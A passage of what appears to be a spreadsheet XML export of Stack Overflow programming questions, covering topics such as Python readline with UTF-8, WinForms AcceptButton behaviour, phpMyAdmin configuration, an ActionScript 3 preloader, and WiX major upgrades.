&lt;p&gt;My question is how would I use PHP to automatically generate the links? Would I have a variable that would automatically increase somehow, hardcode the links in etc, Is there a convention or best practise for this kind of thing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get interactive Python to avoid using readline while allowing utf-8 input?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use a terminal (9term) that does command-line editing itself - programs that use readline just get in its way. It's fully utf-8 aware. How can I make an interactive python session disable readline while retaining utf-8 input and output?&lt;/p&gt;
&lt;p&gt;Currently I use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LANG=en_GB.UTF-8 export LANG
cat | python -i
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;however this causes sys.stdin.encoding to be None, which implies Ascii
(the system default encoding, which doesn't seem to be changeable)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TERM=dumb python
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;doesn't disable readline (and it mangles utf-8 input also).&lt;/p&gt;
&lt;p&gt;I'm new to python, so apologies if this is an obvious question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Error with Html.RouteLink in ASP.NET MVC RC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was using  Html.RouteLink("LINKTEXT","RouteName",new RouteValueDictionary()) in  asp.net MVC beta without problem, today I upgrade to ASP.NET MVC RC and this does no create the link anymore. The route still works because I type in the browser and I go to the Page I want. Any help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Allow user to sort columns from a LINQ query in a DataGridView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't quite work out how to allow a DataGridView populated at runtime to sort (when users click on the column headers) where a LINQ from XML query is the DataSource, via a BindingSource.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Dim QueryReOrder = From Q In Query _
                       Where ((0 - Q.Qualifier) / cmbTSStakeValue.Text) &amp;lt;= 0.1 _
                       Order By Q.Qualifier Descending _
                       Select Q
    Dim bs As New BindingSource
    bs.DataSource = QueryReOrder
    DGFindMatch.DataSource = bs
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Some of the DataGridView's properties are: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sort			Nothing	String
SortProperty				Nothing	System.ComponentModel.PropertyDescriptor
SupportsAdvancedSorting			False	Boolean
SupportsChangeNotification		True	Boolean
SupportsFiltering			False	Boolean
SupportsSearching			False	Boolean
SupportsSorting				False	Boolean
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a simple solution that will allow a user to be able to sort these values by clicking the column header?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WinForms AcceptButton not working?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, this is bugging me, and I just can't figure out what is wrong...&lt;/p&gt;
&lt;p&gt;I have made two forms. First form just has a simple button on it, which opens the other as a dialog like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using (Form2 f = new Form2())
{
    if (f.ShowDialog() != DialogResult.OK)
        MessageBox.Show("Not OK");
    else
        MessageBox.Show("OK");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The second, which is that &lt;code&gt;Form2&lt;/code&gt;, has two buttons on it. All I have done is to set the forms AcceptButton to one, and CancelButton to the other. In my head this is all that should be needed to make this work. But when I run it, I click on the button which opens up Form2. I can now click on the one set as CancelButton, and I get the "Not OK" message box. But when I click on the one set as AcceptButton, nothing happens?
The InitializeComponent code of Form2 looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void InitializeComponent()
{
    this.button1 = new System.Windows.Forms.Button();
    this.button2 = new System.Windows.Forms.Button();
    this.SuspendLayout();
    // 
    // button1
    // 
    this.button1.Location = new System.Drawing.Point(211, 13);
    this.button1.Name = "button1";
    this.button1.Size = new System.Drawing.Size(75, 23);
    this.button1.TabIndex = 0;
    this.button1.Text = "button1";
    this.button1.UseVisualStyleBackColor = true;
    // 
    // button2
    // 
    this.button2.DialogResult = System.Windows.Forms.DialogResult.Cancel;
    this.button2.Location = new System.Drawing.Point(130, 13);
    this.button2.Name = "button2";
    this.button2.Size = new System.Drawing.Size(75, 23);
    this.button2.TabIndex = 1;
    this.button2.Text = "button2";
    this.button2.UseVisualStyleBackColor = true;
    // 
    // Form2
    // 
    this.AcceptButton = this.button1;
    this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
    this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
    this.CancelButton = this.button2;
    this.ClientSize = new System.Drawing.Size(298, 59);
    this.Controls.Add(this.button2);
    this.Controls.Add(this.button1);
    this.Name = "Form2";
    this.Text = "Form2";
    this.Load += new System.EventHandler(this.Form2_Load);
    this.ResumeLayout(false);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have done nothing else than add those two buttons, and set the AcceptButton and CancelButton. Why doesn't it work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>phpMyAdmin - Did the Config files change?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have just installed phpMyAdmin on my new Fedora Core 10 dedicated server.&lt;/p&gt;
&lt;p&gt;I downloaded the phpMyAdmin-3.1.2-english.tar.gz. I extracted it and placed it in this folder /opt/phpMyAdmin-3.1.2-english and i created a symbolic link in the /var/www/html directory so that I can access it like this: &lt;a href="http://www.mydomainname.com/webdb" rel="nofollow"&gt;http://www.mydomainname.com/webdb&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;When I point my browser to that URL it asks me to login and I can only login using localhost as username and a blank password. So I thought I would change it and follow some web tutorials that suggest to change these lines:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$cfg['Servers'][$i]['auth_type'] = â€˜httpâ€™; 
$cfg['Servers'][$i]['user'] = â€˜USERNAMEâ€™;
$cfg['Servers'][$i]['password'] = â€˜PASSWORDâ€™;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, these lines do not even exist in my config.inc.php!!! I have done this install before and I remember these files being there but not with this isntall.&lt;/p&gt;
&lt;p&gt;I tried adding those lines and that didn't make a difference.&lt;/p&gt;
&lt;p&gt;Has phpMyAdmin changed their config files or have i installed incorrectly??&lt;/p&gt;
&lt;p&gt;Thank you for any help!&lt;/p&gt;
&lt;h2&gt;EDIT&lt;/h2&gt;
&lt;p&gt;I managed to remove that one and use a "yum install phpMyAdmin" and the config file here works fine! :)&lt;/p&gt;
&lt;p&gt;However, I am still unable to access phpMyAdmin using the password and username that I suggest in the config.inc.php. Does this mean that the username and password I suggest is config.inc.php is not in line with the MySQL server username and password?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActionScript 3.0 Preloader Issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First off, I greatly appreciate any help, as always....&lt;/p&gt;
&lt;p&gt;I have created a preloader from &lt;a href="http://www.portentinteractive.com/blog/advanced-actionscript-3-preloa.htm" rel="nofollow"&gt;Jarrod's Advanced AS3 Preloader Tutorail&lt;/a&gt;.  I searched elsewhere and this seemed like my best option as it was the only one I understood that did not require 2 SWF files.&lt;/p&gt;
&lt;p&gt;My code is really in 2 classes, my &lt;strong&gt;preloader&lt;/strong&gt; class and my &lt;strong&gt;program&lt;/strong&gt; class. My problem is that the preloader is only loading the graphics that are in my flash and not actually initiating the program class. My question is &lt;em&gt;how do I get my preloading to initiate the program class?&lt;/em&gt; The full code for both files are below.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Preloader.as&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package {
    import flash.display.*;
    import flash.text.*;
    import flash.events.*;
    import fl.containers.ScrollPane;
    import flash.filters.*;
    public class Preloader extends MovieClip {
    	public static  const ENTRY_FRAME:Number=3;
    	public static  const DOCUMENT_CLASS:String='Program';
    	public var myText:TextField;
    	public var myFormat:TextFormat;
    	private var progressBar:Sprite;
    	private var progressText:TextField;
    	public function Preloader() {
    		stop();
    		progressBar = getChildByName("loadbar_mc") as Sprite;
    		progressText = getChildByName("loading_txt") as TextField;
    		progressBar.scaleX = 0;
    		myFormat = new TextFormat();
    		myFormat.font="Helvetica";
    		myFormat.color = 0x000000;
    		myFormat.size = 24;
    		loaderInfo.addEventListener(Event.INIT, initHandler);
    		loaderInfo.addEventListener(ProgressEvent.PROGRESS, progressHandler);
    		loaderInfo.addEventListener(Event.COMPLETE, completeHandler);
    		loaderInfo.addEventListener(IOErrorEvent.IO_ERROR, errorHandler);
    	}
    	private function initHandler(event:Event):void {
    		progressBar.scaleX = 0;
    		progressText.text = "Loading 0%";
    	}
    	private function progressHandler(event:ProgressEvent):void {
    		var loaded:uint = event.bytesLoaded;
    		var total:uint = event.bytesTotal;
    		var percentLoaded:Number = Math.round((loaded/total) * 50);
    		progressBar.scaleX = loaded/total;
    		progressText.text = "Loading " + percentLoaded + "%";
    	}
    	private function completeHandler(event:Event):void {
    		play();
    		addEventListener(Event.ENTER_FRAME, enterFrameHandler);
    	}
    	private function enterFrameHandler(event:Event):void {
    		if (currentFrame &amp;gt;= Preloader.ENTRY_FRAME) {
    			removeEventListener(Event.ENTER_FRAME, enterFrameHandler);
    			stop();
    			main();
    		}
    	}
    	private function errorHandler(event:IOErrorEvent):void {
    		myText.text = ("Sorry, there was an error. " + event);
    		myText.setTextFormat(myFormat);
    	}
    	private function main():void {
    		var programClass:Class = loaderInfo.applicationDomain.getDefinition(Preloader.DOCUMENT_CLASS) as Class;
    		var program:Sprite = new programClass() as Sprite;
    		addChild(program);
    	}
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Program.as&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package {
    import flash.display.*;
    import flash.events.*;
    import flash.filters.*;
    import flash.text.*;
    import fl.controls.TextInput;
    import fl.transitions.Tween;
    import fl.transitions.easing.*;
    import fl.containers.ScrollPane;
    import flash.geom.Rectangle;
    import fl.controls.Label;
    public class Program extends Sprite {
    	public function Program() {
    		//define variable
    		var startX:Number;
    		var startY:Number;
    		var counter:Number = 0;
    		var intMessages:Number = 550;
    		var limit:Number = 10;
    		var intBoardSize:Number = 476*(Math.round(intMessages/15)+1);
    		var intMessageMinX:Number = 35;
    		var intMessageMaxX:Number = intBoardSize-99;
    		var intMessageMinY:Number = 50;
    		var intMessageMaxY:Number = 310;
    		var activeGloveName:String = ""
    		var intDegreeHigh:Number = 45;
    		var intDegreeLow:Number = -45;
    		var newGlove:mcGlove;
    		//create objects
    		var myGlove:mcGlove = new mcGlove();
    		var showGlove:mcGlove = new mcGlove
    		var mcglovetarget:mcGloveTarget = new mcGloveTarget();
    		var myDropShadowFilterSmall = new DropShadowFilter (2,45,0x000000,0.65,3,3,2,3,false,false,false);
    		var myDropShadowFilterDown = new DropShadowFilter (3,45,0x000000,0.65,5,5,2,3,false,false,false);
    		var myDropShadowFilterUp = new DropShadowFilter (5,45,0x000000,0.65,7,7,2,3,false,false,false);
    		var topShadow = new DropShadowFilter (3,90,0x000000,0.35,8,8,2,3,false,false,false);
    		var pinkline:Sprite = new Sprite();
    		var searchBox:Sprite = new Sprite();
    		var txtSearchBox:TextInput = new TextInput();
    		var sSearchBox_Label:String = "Go to glove #";
    		var messageFormat:TextFormat = new TextFormat();
    		var messageTextField:Label = new Label();
    		var searchBoxLFormat:TextFormat = new TextFormat();
    		var txtSearchBox_Label:TextField = new TextField();
    		var SearchBoxBg:Sprite = new Sprite();
    		var topShadowBox:Sprite = new Sprite();
    		var searchButton:searchBtn = new searchBtn();
    		var alertRect:Rectangle = new Rectangle(0,0,848,393);
    		var errorMessage:AlertBox = new AlertBox(alertRect);
    		var holder:MovieClip = new MovieClip();
    		var aMessages:Array = new Array();
    		//Create a glove for each message
    		for (var gloveCount = 0; gloveCount &amp;lt; intMessages; gloveCount++){
    			aMessages[gloveCount] = new mcGlove();
    			aMessages[gloveCount] = createMessage(aMessages[gloveCount], gloveCount, gloveCount);
    		}
    		var scrollPane:ScrollPane = new ScrollPane();
    		scrollPane.verticalScrollPolicy = "false";
            scrollPane.move(374, 0);
            scrollPane.setSize(476, 370);
    		scrollPane.horizontalLineScrollSize = 120;
    		topShadowBox.graphics.beginFill(0x333333);
    		topShadowBox.graphics.drawRect(0,0,870,5);
    		topShadowBox.x = -10;
    		topShadowBox.y = -5;
    		topShadowBox.filters = [topShadow];
    		pinkline.graphics.beginFill(0xDB9195);
    		pinkline.graphics.drawRect(0,0,476,2);
    		pinkline.x = 374;
    		pinkline.y = 353;
    		searchBox.graphics.beginFill(0xDB9195);
    		searchBox.graphics.drawRect(0,0,476,25);
    		searchBox.x = 374;
    		searchBox.y = 370;
    		SearchBoxBg.graphics.beginFill(0xffffff);
    		SearchBoxBg.graphics.drawRect(0,0,35,17);
    		SearchBoxBg.x = 475;
    		SearchBoxBg.y = 374;
    		txtSearchBox.width = 35;
    		txtSearchBox.height = 15;
    		txtSearchBox.move(475,375);
    		txtSearchBox.restrict = "0-9";
    		txtSearchBox.maxChars = 4;
    		//txtSearchBox.background = "0xffffff";
    		//txtSearchBox.border = "0x0xDB9195";
    		searchBoxLFormat.font="Helvetica";
    		searchBoxLFormat.color = 0xffffff;
    		searchBoxLFormat.bold = true;
    		searchBoxLFormat.size = 10;
    		txtSearchBox_Label.x = 400;
    		txtSearchBox_Label.y = 374;
    		txtSearchBox_Label.width = 70;
    		txtSearchBox_Label.height = 17;
    		txtSearchBox_Label.text = sSearchBox_Label;
    		txtSearchBox_Label.setTextFormat(searchBoxLFormat);
    		searchButton.x = 534;
    		searchButton.y = 382;
    		//add to frame
    		sortObjects();
    		scrollPane.source = holder;			
    		//create instance names for referancing/compairing objects
    		myGlove.name = "mcglove";
    		myGlove.setGloveMessage("My Sister Suzy, I pray that she will be ok. I love here so much, she is the best sister ever.  I miss you RIP");
    		mcglovetarget.name = "mcglovetarget";
    		messageFormat.font="Helvetica";
    		messageFormat.color = 0xffffff;
    		messageFormat.bold = true;
    		messageFormat.size = 17;
    		messageFormat.align = "center";
    		messageTextField.x = -85;
    		messageTextField.y = -40;
    		messageTextField.width = 135;
    		messageTextField.height = 140;
    		messageTextField.text = myGlove.getGloveMessage();
    		messageTextField.wordWrap = true;
    		messageTextField.mouseEnabled = false;
    		messageTextField.buttonMode = true;
    		messageTextField.setStyle("textFormat", messageFormat);
    		//messageTextField.hitArea = 0;
    		myGlove.addChild(messageTextField);			
    		//position the glove and modify apperiance
    		myGlove.x = 163;
    		myGlove.y = 211;
    		myGlove.filters = [myDropShadowFilterDown];
    		//myGlove.addChild(messageTextField);
    		showGlove.x = 163;
    		showGlove.y = 211;
    		showGlove.filters = [myDropShadowFilterDown];
    		mcglovetarget.x = 615;
    		mcglovetarget.y = 211;
    		mcglovetarget.alpha = 0
    		//action listeners
    		myGlove.addEventListener(MouseEvent.MOUSE_DOWN, selectGlove);
    		myGlove.addEventListener(MouseEvent.MOUSE_UP, releaseGlove);
    		searchButton.addEventListener(MouseEvent.CLICK, searchMessages);
    		txtSearchBox.addEventListener(KeyboardEvent.KEY_UP, checkForEnter);
    		function selectGlove(event:MouseEvent):void {
    			event.currentTarget.startDrag(true);
    			var myTargetName:String = event.currentTarget.name + "target";
    			var myTarget:DisplayObject = getChildByName(myTargetName);
    			myGlove.filters = [myDropShadowFilterUp];
    			addChild(myTarget);
    			event.currentTarget.parent.addChild(event.currentTarget);
    			addChild(topShadowBox);
    			myTarget.alpha = .5;
    			startX = event.currentTarget.x;
    			startY = event.currentTarget.y;
    		}
    		function releaseGlove(event:MouseEvent):void {
    			event.currentTarget.stopDrag();
    			var myTargetName:String = event.currentTarget.name + "target";
    			var myTarget:DisplayObject = getChildByName(myTargetName);
    			event.currentTarget.filters = [myDropShadowFilterDown];
    			myTarget.alpha = 0;
    			if (event.currentTarget.dropTarget != null &amp;amp;&amp;amp; event.currentTarget.dropTarget.parent == myTarget){
    				event.currentTarget.removeEventListener(MouseEvent.MOUSE_DOWN, selectGlove);
    				event.currentTarget.removeEventListener(MouseEvent.MOUSE_UP, releaseGlove);
    				event.currentTarget.x = myTarget.x;
    				event.currentTarget.y = myTarget.y;
    				var myTween:Tween = new Tween(getChildByName(event.currentTarget.name), "scaleX",Strong.easeOut,getChildByName(event.currentTarget.name).scaleX,.28,2,true);
    				var myTween2:Tween = new Tween(getChildByName(event.currentTarget.name), "scaleY",Strong.easeOut,getChildByName(event.currentTarget.name).scaleY,.28,2,true);
    				holder.addChild(getChildByName(event.currentTarget.name));
    				event.currentTarget.removeChild(messageTextField);
    				scrollPane.source = holder;
    				holder.getChildByName(event.currentTarget.name).x=Math.round(Math.random() * (470+Math.round(scrollPane.horizontalScrollPosition) - Math.round(scrollPane.horizontalScrollPosition))) + Math.round(scrollPane.horizontalScrollPosition);
    				holder.getChildByName(event.currentTarget.name).y=Math.round(Math.random() * (intMessageMaxY - intMessageMinY)) + intMessageMinY;
    				holder.getChildByName(event.currentTarget.name).addEventListener(MouseEvent.MOUSE_DOWN, clickMessage);
    				holder.getChildByName(event.currentTarget.name).addEventListener(MouseEvent.MOUSE_UP, releaseMessage);
    				event.currentTarget.name = "" + intMessages;
    				addChild(showGlove);
    				messageTextField.text = "Select a glove to view its message here.";
    				showGlove.addChild(messageTextField);
    			} else {
    				event.currentTarget.x = startX;
    				event.currentTarget.y = startY;
    			}
             	//sortObjects();
    			addChild(mcglovetarget);
    			addChild(scrollPane);
    			addChild(pinkline);
    			addChild(searchBox);
    			addChild(SearchBoxBg);
    			addChild(txtSearchBox);
    			addChild(txtSearchBox_Label);
    			addChild(searchButton);
    			addChild(topShadowBox);
    		}
    		function position(target) {
    			target.x = Math.round(Math.random() * (intMessageMaxX - intMessageMinX)) + intMessageMinX;
    			target.y = Math.round(Math.random() * (intMessageMaxY - intMessageMinY)) + intMessageMinY;
    			for (var i:uint=0; i&amp;lt;aMessages.length -1 ; i++) {
    				if(target.hitTestObject(aMessages[i]) &amp;amp;&amp;amp; counter &amp;lt; limit){
    					counter++;
    					position(target);
    					//return false;
    				};
    			}
    		} 
    		function createMessage(newGlove:mcGlove, sName:String, sMessage:String){
    			newGlove.scaleX = .28;
    			newGlove.scaleY = .28;
    			counter = 0;
    			position(newGlove);
    			newGlove.rotation = (0, 0, 0, Math.round(Math.random() * (intDegreeHigh - intDegreeLow)) + intDegreeLow);
    			newGlove.filters = [myDropShadowFilterSmall];
    			newGlove.name = sName;
    			holder.addChild(newGlove);
    			newGlove.setGloveMessage(sMessage);
    			newGlove.addEventListener(MouseEvent.MOUSE_DOWN, clickMessage);
    			newGlove.addEventListener(MouseEvent.MOUSE_UP, releaseMessage);
    			newGlove.buttonMode = true;
    			return newGlove;
    		}
    		function clickMessage(event:MouseEvent):void{
    			selectMessage(event.target);
    		}
    		function checkForEnter(event:KeyboardEvent):void
    		{
    			if (event.keyCode == 13) // If Keypress is Enter
    			{
    				searchMessages();
    			}
    		}
    		function searchMessages():void{
    			if (showGlove.parent == mcglovetarget.parent){
    				if ( txtSearchBox.text != "" ){
    					var searchTarget:DisplayObject = holder.getChildByName(txtSearchBox.text);
    					if (searchTarget){
    						selectMessage(searchTarget);
    						scrollPane.horizontalScrollPosition = searchTarget.x - 220;
    					}else if(1==1){ //if in file
    						gloveCount = aMessages.length;
    						aMessages[gloveCount] = new mcGlove();
    						aMessages[gloveCount] = createMessage(aMessages[gloveCount], txtSearchBox.text, txtSearchBox.text);
    						selectMessage(aMessages[gloveCount]);
    						scrollPane.horizontalScrollPosition = aMessages[gloveCount].x - 220;
    					}else{
    						errorMessage.setAlertText("Sorry, the glove you are searching for does not exist.");
    						addChild(errorMessage);
    					}
    				}
    			}else{
    				errorMessage.setAlertText("You must post your message first, otherwise your message will be lost.");
    				addChild(errorMessage);
    			}
    		}
    		function selectMessage(object:mcGlove):void{
    			if (showGlove.parent == mcglovetarget.parent){
    				if (activeGloveName != ""){
    					var activeGlove:DisplayObject = holder.getChildByName(activeGloveName);
    					activeGlove.filters = [myDropShadowFilterSmall];
    					activeGlove.scaleX = .28;
    					activeGlove.scaleY = .28;
    					holder.addChild(activeGlove);
    				}
    				activeGloveName = object.name;
    				//event.target.dragIt();
    				holder.addChild(object);
    				object.filters = [new GlowFilter(0xABEEFC, .65, 15, 15, 1, 1, false, false)];
    				object.scaleX = .35;
    				object.scaleY = .35;
    				messageTextField.text = object.getGloveMessage();
    			}else{
    				errorMessage.setAlertText("You must post your message first, otherwise your message will be lost.");
    				addChild(errorMessage);
    			}
    		}
    		function releaseMessage(event:MouseEvent):void{
    			event.target.dropIt();
    		}
    		function sortObjects():void{
    			addChild(mcglovetarget);
    			addChild(scrollPane);
    			addChild(pinkline);
    			addChild(searchBox);
    			addChild(SearchBoxBg);
    			addChild(txtSearchBox);
    			addChild(txtSearchBox_Label);
    			addChild(searchButton);
    			addChild(myGlove);
    			addChild(topShadowBox);
    		}
    		myGlove.buttonMode = true;
    		searchButton.buttonMode = true;
    	}
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to tell user events from synthetic events?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a JFace editor that is mostly made up of a &lt;code&gt;TreeViewer&lt;/code&gt;. This is hooked up to a &lt;code&gt;ContentOutlinePage&lt;/code&gt; to bring the Outline view to life.&lt;/p&gt;
&lt;p&gt;When either one receives a &lt;code&gt;SelectionChangedEvent&lt;/code&gt; they call the others &lt;code&gt;setSelection()&lt;/code&gt; method ... and therein lies the problem. &lt;code&gt;setSelection()&lt;/code&gt; generates another &lt;code&gt;SelectionChangedEvent&lt;/code&gt; ... and thus the infinite loop is joined.&lt;/p&gt;
&lt;p&gt;Is there a means of telling if the &lt;code&gt;SelectionChangedEvent&lt;/code&gt; was created by actual user interaction rather than by another object calling &lt;code&gt;setSelection()&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Is there a better means still of stopping this sort of deadly-embrace?&lt;/p&gt;
&lt;p&gt;Clues welcomed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing checkboxes using Javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a series of checkboxes on an HTML page and I would like to check the checkboxes based on corresponding HTML query string params.&lt;/p&gt;
&lt;p&gt;e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;...path/page.html?i=1&amp;amp;j=1&amp;amp;x=0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would cause a page with three checkboxes to check 1 and 2 on load.&lt;/p&gt;
&lt;p&gt;Can someone show me how to do this or point me in the direction of a suitable tutorial?&lt;/p&gt;
&lt;p&gt;Many Thanks,&lt;/p&gt;
&lt;p&gt;EDIT: A clarification, i, j and x are just picked off the top of my head, but they are boolean variables (1 = true, 0 = false) and each corresponds to a checkbox so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;i = one checkbox, the value in the example is 1, so the checkbox should be checked.
j = as above
x = one checkbox, the value in the example is 0, so the checkbox should not be checked.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>c# compare two generic values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/390900/cant-operator-be-applied-to-generic-types-in-c"&gt;Canâ€™t operator == be applied to generic types in C#?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've coded something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public bool IsDataChanged()
{           
    T value1 = GetValue2;
    T value2 = GetValue1();
    return (valueInDB != valueFromView);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Right now the function doesn't compile with the error "&lt;em&gt;Operator '!=' cannot be applied to operands of type 'T' and 'T'&lt;/em&gt;". What do I have to do to make this function work ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I change the owner of the file saved through IIS (with ASP.NET)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to change owner of saved file using IIS on Windows Server. The easier the better. It doesn't matter either this will have to be done during saving or changing file owner after file is already saved to disc. An example in ASP.NET is highly apriciated. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to insert a multi-line code snippet relative to the cursor position in Visual Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using code snippets in Visual Studio that contain multiple lines the following lines will preserve the whitespace that was set in the .snippet file instead of positioning the code relative to the original cursor placement.&lt;/p&gt;
&lt;p&gt;When using the foreach snippet you'll get code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    foreach (var item in collection)
{
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    foreach (var item in collection)
    {
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to change this behavior?  Is there a keyword that needs to be used in the .snippet file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does IE7's "View Source" button interact with javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm debugging someone else's code for a web page that is made with ASP.NET with some javascript effects. It's a form that we are pre-populating with edit-able data, and one of the text boxes is getting populated with an incorrect value. &lt;/p&gt;
&lt;p&gt;I know that the text box is getting filled with the correct value in the code behind, but somewhere between there and the browser it gets overwritten. &lt;/p&gt;
&lt;p&gt;In trying to find out where that happened, I came across an interesting situation. If I right-click near the offending element and select "view page source," I can scroll down to the element and see&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input name="RecurrenceProperties$TextBox57" type="text" value="HEY ITS THE RIGHT VALUE" id="RecurrenceProperties_TextBox57" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the wrong value is in both the rendered html and the IE developer toolbar. &lt;/p&gt;
&lt;p&gt;This seems like a hell of a clue, but I don't know enough about how "View Source" works to tell what is going on behind the curtain. What happens between the generation of the "View Source" source and the page actually rendering?&lt;/p&gt;
&lt;p&gt;EDIT: I found where it was going wrong by putting a break-point on everywhere that ID occurs in javascript (not exactly elegant, but I found it). &lt;/p&gt;
&lt;p&gt;Suggestions to disable javascript and use IE8 were very helpful. thanks. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I request the database product name with ADO.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I develop a product with a custom database configuration. I use ADO.NET with System.Data.Odbc.OdbcConnection for it. To make some differences between the databases is there a simple solution to detect the current DBMS of a connection.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wix major upgrade</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I use WIX to prevent overwriting a config file during a 'Major Upgrade'?&lt;/p&gt;
&lt;p&gt;I want the file to be installed on the initial install, removed on uninstall, and left unchanged on a 'Major Upgrade'.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>calculate exponential moving average in python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a range of dates and a measurement on each of those dates.  I'd like to calculate an exponential moving average for each of the dates.  Does anybody know how to do this?&lt;/p&gt;
&lt;p&gt;I'm new to python.  It doesn't appear that averages are built into the standard python library, which strikes me as a little odd.  Maybe I'm not looking in the right place.&lt;/p&gt;
&lt;p&gt;So, given the following code, how could I calculate the moving weighted average of IQ points for calendar dates?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from datetime import date
days = [date(2008,1,1), date(2008,1,2), date(2008,1,7)]
IQ = [110, 105, 90]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(there's probably a better way to structure the data, any advice would be appreciated)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;ol&gt; with numbers another color</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;&amp;lt;ol&amp;gt;
   &amp;lt;li&amp;gt;test&amp;lt;/li&amp;gt;
   &amp;lt;li&amp;gt;test&amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will show as:&lt;/p&gt;
&lt;ol&gt;
       &lt;li&gt;test&lt;/li&gt;
       &lt;li&gt;test&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I want to have numbers coloured and text black!&lt;/p&gt;
&lt;p&gt;I can edit the css, but I do not have access to the HTML.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OOP approach for inventory system</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're developing a system to track inventory at our field offices.&lt;/p&gt;
&lt;p&gt;At its core, the system will have a list of "Assets" - things like Bikes, Computers, Tents. Each Asset goes through states like "Active", "Lost", "Checked Out", "Inventoried". Some states have additional information, like "Checked Out To" or "Inventoried By".&lt;/p&gt;
&lt;p&gt;So, I'm thinking each State will be a subclass of a parent class or perhaps implement a iState interface. That part is clear to me.&lt;/p&gt;
&lt;p&gt;What I'm stuck on is a good OOP design to put the business logic of what states can follow the previous state (The Asset object will store it's "last" state). For example, Checked In can only follow Checked Out. Active must be the first state recorded on an Asset.&lt;/p&gt;
&lt;p&gt;Any ideas or pointers would be helpful. None of the GoF design patterns jumped out at me on this one.&lt;/p&gt;
&lt;p&gt;And yes, I know we should be looking at COTS, but management has decided to proceed with rolling our own tool for now.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reporting Services: Tablix RepeatColumnHeaders doesn't work on some reports</t>
  </si>
  <si>
